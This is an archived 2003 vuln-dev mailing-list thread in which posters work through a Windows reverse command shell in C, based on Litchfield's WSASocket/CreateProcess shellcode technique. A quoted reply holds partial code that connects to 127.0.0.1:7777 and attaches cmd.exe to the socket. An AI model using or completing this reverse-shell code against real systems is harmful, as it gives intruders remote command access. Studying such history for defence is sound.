Re[2]: Windows reverse Shell
From: Adik <netninja(at)hotmail.kg>
Date: Wed Feb 05 2003 - 04:03:03 EST

Hello 3APA3A,

Thanks for your code. The one I wrote is absolutely the same without bind. In fact we don't need "bind", though David Litchfield mentions it in his Blackhat talk. So anyway, did you try compiling your code? If not you should try, because I see the same results, i.e. I get a connection on my netcat, but then it suddenly disconnects. No command prompt.

Tuesday, February 4, 2003, 10:34:56 PM, you wrote:

3> Dear NetNinja,
3> Code below successfully brings reverse shell to 127.0.0.1:7777.
3> #include
3> struct sockaddr_in sin;
3> int size = sizeof(sin);
3> memset(&sin, 0, sizeof(sin));
3> memset(&si, 0, sizeof(si));
3> WSAStartup(MAKEWORD( 1, 1 ), &wd);
3> sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
3> sin.sin_family = AF_INET;
3> bind(sock, (struct sockaddr*)&sin, size);
3> sin.sin_port = htons(7777);
3> sin.sin_addr.s_addr = inet_addr("127.0.0.1");
3> connect(sock, (struct sockaddr*)&sin, size);
3> si.cb = sizeof(si);
3> si.dwFlags = STARTF_USESTDHANDLES;
3> si.hStdInput = si.hStdOutput = si.hStdError = sock;
3> CreateProcess(
3> NULL,
3> "cmd.exe",
3> NULL,
3> NULL,
3> TRUE,
3> 0,
3> 0,
3> NULL,
3> &si,
3> &pi
3> );
3> return 0;
3> }
3> --
3> Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-dev@securityfocus.com:
N>> Hello guys,
N>> David Litchfield in his Blackhat talk talked about using the socket handle
N>> from WSASocket() and passing that handle as a parameter to stdin, stdout
N>> and stderr for the CreateProcess function. By doing it this way his reverse
N>> cmd shellcode becomes much smaller. I tried coding that reverse
N>> command shell in C, but couldn't get it to work. It simply connects to
N>> my listening netcat listener and then disconnects. David Litchfield
N>> used 4 functions to achieve that: WSASocket, bind, connect and
N>> CreateProcess. A little help would be appreciated on building this reverse
N>> cmd shell. Thanks.

--
Best regards,
Adik
mailto:netninja@hotmail.kg

Received on Wed Feb 5 12:26:21 2003
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT